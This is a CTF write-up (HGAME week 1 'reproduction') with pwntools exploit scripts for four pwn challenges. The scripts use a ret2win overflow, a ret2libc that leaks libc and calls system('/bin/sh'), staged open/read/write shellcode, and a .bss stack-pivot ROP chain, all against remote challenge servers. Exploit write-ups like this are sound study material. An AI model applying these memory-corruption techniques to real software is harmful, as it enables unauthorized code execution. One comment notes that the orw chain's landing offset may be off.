HGAME week1 复现

PWN:

easy_overflow:

exp:

from pwn import *
context(log_level='debug',arch='amd64',terminal=['tmux','splitw','-h'])

io = remote("node2.anna.nssctf.cn", 28949)

RET_GADGET = 0x40101a   # lone `ret`: shifts rsp by 8 so the stack is 16-byte aligned at the next call
TARGET = 0x401176       # function we return into (0x401xxx text address, so the binary is presumably non-PIE; name not visible here)

# 0x18 bytes of filler reach the saved return address, which becomes the
# ret gadget, followed by the real target.
chain = flat(cyclic(0x18), RET_GADGET, TARGET)
io.send(chain)
# Presumably the challenge closes stdout before spawning the shell; point
# fd 1 back at fd 0 (the socket) so the shell's output reaches us.
io.sendline(b"exec 1>&0")
io.interactive()



enter the pwn land:

注意：溢出会把栈上的局部变量一起覆盖，payload 在 ROP 链之前用 p32(1)+p32(0x2c)+p64(0) 把它们填回合法值，具体数值要对照反汇编确认。
exp:

from pwn import *
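context(log_level='debug',arch='amd64',terminal=['tmux','splitw','-h'])

io = remote("node3.anna.nssctf.cn", 28032)
# io=process("./service")
elf = ELF("./service")
libc = ELF("./libc1.so")

puts_got = elf.got[b"puts"]
puts_plt = elf.plt[b"puts"]
ret = 0x40101a          # lone `ret`
pop_rdi_ret = 0x401313  # pop rdi ; ret
start = 0x4010d0        # address we return to so the program runs again and reads a second input (presumably _start)

# Stack layout implied by the payload: 0x28 bytes of buffer, then two 32-bit
# locals the overflow would otherwise clobber (restored to 1 and 0x2c; their
# meaning is in the disassembly), then presumably the saved rbp (0), then the
# return address.
locals_fixup = p32(1) + p32(0x2c) + p64(0)

# Stage 1: puts(puts@got) leaks the libc address of puts, then restart.
payload = cyclic(0x28) + locals_fixup + p64(pop_rdi_ret) + p64(puts_got) + p64(puts_plt) + p64(start)
io.sendline(payload)

# A user-space x86-64 libc pointer looks like 0x00007fxxxxxxxxxx, so read up
# to the first 0x7f byte and take the 6 bytes before it.  This is fragile if
# any output printed before the address happens to contain 0x7f.
leak_addr = u64(io.recvuntil(b"\x7f")[-6:].ljust(8, b"\x00"))
print("leak_addr:  " + hex(leak_addr))
libc_addr = leak_addr - libc.sym[b"puts"]
print("libc_addr:  " + hex(libc_addr))
# libc is mapped at page granularity, so a correct base is 0x1000-aligned.
# Anything else means the leak was mis-parsed or libc1.so is not the remote
# libc build; stop here rather than sending a garbage second stage.
if libc_addr & 0xfff:
    raise ValueError("libc base %#x is not page-aligned: bad leak or wrong libc build" % libc_addr)

sys_addr = libc_addr + libc.sym[b"system"]
str_bin_sh = libc_addr + next(libc.search(b"/bin/sh"))

# Stage 2: same local fixup, an extra `ret` so rsp is 16-byte aligned when
# system() is entered (glibc's system uses movaps and faults otherwise),
# then system("/bin/sh").
payload = cyclic(0x28) + locals_fixup + p64(ret) + p64(pop_rdi_ret) + p64(str_bin_sh) + p64(sys_addr)
io.sendline(payload)

io.interactive()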
# Gadgets information
# ============================================================
# 0x000000000040130c : pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
# 0x000000000040130e : pop r13 ; pop r14 ; pop r15 ; ret
# 0x0000000000401310 : pop r14 ; pop r15 ; ret
# 0x0000000000401312 : pop r15 ; ret
# 0x000000000040130b : pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
# 0x000000000040130f : pop rbp ; pop r14 ; pop r15 ; ret
# 0x000000000040119d : pop rbp ; ret
# 0x0000000000401313 : pop rdi ; ret
# 0x0000000000401311 : pop rsi ; pop r15 ; ret
# 0x000000000040130d : pop rsp ; pop r13 ; pop r14 ; pop r15 ; ret
# 0x000000000040101a : ret

# Unique gadgets found: 11



simple_shellcode:

溢出长度不够，先放一段很短的 read stub，把完整的 orw shellcode 读到 0xCAFE0010 再接着执行；注意 shellcode 的起始地址，stub 与第二段 shellcode（以及 flag 缓冲区）不能重叠。
exp:

from pwn import *
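context(log_level='debug',arch='amd64',os='linux',terminal=['tmux','splitw','-h'])


# io=process("./vuln")
io = remote("node3.anna.nssctf.cn", 28491)

# gdb.attach(io)
# pause()

SC_BASE = 0xCAFE0000        # page the challenge runs our shellcode from (stage 2 is placed at +0x10)
STAGE2 = SC_BASE + 0x10     # entry of the full ORW shellcode
FLAG_BUF = SC_BASE + 0x100  # flag scratch buffer: same (writable) page, but past the code
FLAG_LEN = 0x50

io.recvuntil(b"shellcode:\n")
# Stage 1: tiny read stub that pulls stage 2 in from fd 0.  It only sets rdi
# (fd 0) and rsi (destination); it relies on rax already being 0 (SYS_read)
# and on rdx holding a large enough count when it runs -- TODO confirm from
# the binary.  The stub is 14 bytes; the two bytes before STAGE2 are whatever
# the page already holds -- verify they execute harmlessly.
stage1 = asm(f'''
    xor rdi,rdi
    mov rsi,{STAGE2:#x}
    syscall
    nop
''')
io.send(stage1)

# Stage 2: open("./flag") -> read(3, FLAG_BUF) -> write(1, FLAG_BUF).
# fd 3 assumes the program has no other files open.  FLAG_BUF deliberately
# lies past the shellcode: reading into 0xCAFE0000 for 0x50 bytes overlaps
# stage 2 itself (placed at +0x10), so a long enough flag would overwrite the
# write stub before it has executed.
stage2 = asm(
    shellcraft.open("./flag")
    + shellcraft.read(3, FLAG_BUF, FLAG_LEN)
    + shellcraft.write(1, FLAG_BUF, FLAG_LEN)
)
io.send(stage2)

io.interactive()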



orw:

第一次输入用 puts 泄露 libc 基址，第二次输入做栈迁移（把 rbp/rsp 劫持到 bss 上伪造的栈帧），注意每次 leave;ret 之后 rsp 的落点要算准 =_=
exp:

from pwn import *
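context(log_level='debug',arch='amd64',terminal=['tmux','splitw','-h'])


# io=process("./vuln")
io = remote("node3.anna.nssctf.cn", 28611)
elf = ELF("./vuln")
libc = ELF("./libc-2.31.so")

bss_addr = 0x404300   #404220  -- fake stack frame in .bss (must be writable and otherwise unused)
read_text = 0x4012CF  # mid-function: read(0, rbp-0x100, 0x130) followed by leave;ret (inferred from the payload layout below)
main = 0x4012f0
pop_rdi_ret = 0x401393
ret = 0x40101a        # unused here
rsi_r15 = 0x401391    # pop rsi ; pop r15 ; ret -- unused here, the libc pop rsi;ret below is used instead
leave_ret = 0x4012be
puts_plt = elf.plt[b"puts"]
puts_got = elf.got[b"puts"]

# --- stage 1: puts(puts@got) leaks libc, then return to main for another round
io.recvuntil(b"task.\n")
payload = cyclic(0x108) + p64(pop_rdi_ret) + p64(puts_got) + p64(puts_plt) + p64(main)
io.send(payload)

# User-space x86-64 libc pointers look like 0x00007fxxxxxxxxxx: read up to
# the first 0x7f byte and take the 6 bytes before it (fragile if earlier
# output contains 0x7f).
leak_addr = u64(io.recvuntil(b"\x7f")[-6:].ljust(8, b"\x00"))
print("leak_addr: " + hex(leak_addr))
libc_addr = leak_addr - libc.sym[b"puts"]
print("libc_addr:  " + hex(libc_addr))
# libc is mapped at page granularity, so a correct base is 0x1000-aligned;
# anything else means a mis-parsed leak or the wrong libc build.  Fail now
# instead of pivoting onto garbage gadget addresses.
if libc_addr & 0xfff:
    raise ValueError("libc base %#x is not page-aligned: bad leak or wrong libc build" % libc_addr)
open_addr = libc_addr + libc.sym[b"open"]
write_addr = libc_addr + libc.sym[b"write"]
read_addr = elf.plt[b"read"]   # read through the binary's PLT, no libc offset needed
# gadget offsets are specific to this libc-2.31 build
pop_rdx_ret = 0x142c92 + libc_addr
pop_rsi_ret = 0x2601f + libc_addr


# gdb.attach(io)
# pause()


# --- stage 2: stack pivot onto .bss
io.recvuntil(b"task.\n")
# saved rbp := bss_addr and return into read_text, so the next read() lands
# at bss_addr-0x100 = 0x404200 and the function's leave;ret then runs with
# rsp on our fake frame.
payload = cyclic(0x100) + p64(bss_addr) + p64(read_text)
payload = payload.ljust(0x130, b"a")
io.send(payload)

# Lands at 0x404200: "./flag" at 0x4042f8 (used by the chain below), new
# saved rbp bss_addr+0x118 at 0x404300 (so the next read lands at
# bss_addr+0x18), read_text again at 0x404308, 'a' padding after that.
payload = cyclic(0x100 - 0x8) + b"./flag\x00\x00" + p64(bss_addr + 0x100 + 0x8 + 0x8) + p64(read_text)
payload = payload.ljust(0x130, b"a")
io.send(payload)

# ROP chain, landing at bss_addr+0x18 = 0x404318.  The flag buffer at
# bss_addr+0x300 assumes .bss is mapped that far; fd 3 assumes no other
# files are open.
#open
payload = p64(pop_rdi_ret) + p64(0x4042f8) + p64(pop_rsi_ret) + p64(0) + p64(open_addr)
#read
payload += p64(pop_rdi_ret) + p64(3) + p64(pop_rsi_ret) + p64(bss_addr + 0x300) + p64(pop_rdx_ret) + p64(0x50) + p64(read_addr)
#write
payload += p64(pop_rdi_ret) + p64(1) + p64(pop_rsi_ret) + p64(bss_addr + 0x300) + p64(pop_rdx_ret) + p64(0x50) + p64(write_addr)

# Final frame: saved rbp = bss_addr+0x8, return into leave;ret, which sets
# rsp = bss_addr+0x8, pops rbp from there and returns to [bss_addr+0x10].
# NOTE(review): by the layout above the chain starts at bss_addr+0x18 and
# bss_addr+0x10 still holds the 'a' padding of the previous payload; for the
# chain to start at the first gadget the value here would have to be
# bss_addr+0x10.  Verify the actual landing spot in gdb before relying on it.
payload = payload.ljust(0x100, b"\x00") + p64(bss_addr + 0x8) + p64(leave_ret)
io.send(payload)

io.interactive()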

# Gadgets information
# ============================================================
# 0x00000000004012be : leave ; ret
# 0x000000000040138c : pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
# 0x000000000040138e : pop r13 ; pop r14 ; pop r15 ; ret
# 0x0000000000401390 : pop r14 ; pop r15 ; ret
# 0x0000000000401392 : pop r15 ; ret
# 0x000000000040138b : pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
# 0x000000000040138f : pop rbp ; pop r14 ; pop r15 ; ret
# 0x000000000040117d : pop rbp ; ret
# 0x0000000000401393 : pop rdi ; ret
# 0x0000000000401391 : pop rsi ; pop r15 ; ret
# 0x000000000040138d : pop rsp ; pop r13 ; pop r14 ; pop r15 ; ret
# 0x000000000040101a : ret
# 0x00000000004012a8 : ret 0x2be

# Unique gadgets found: 13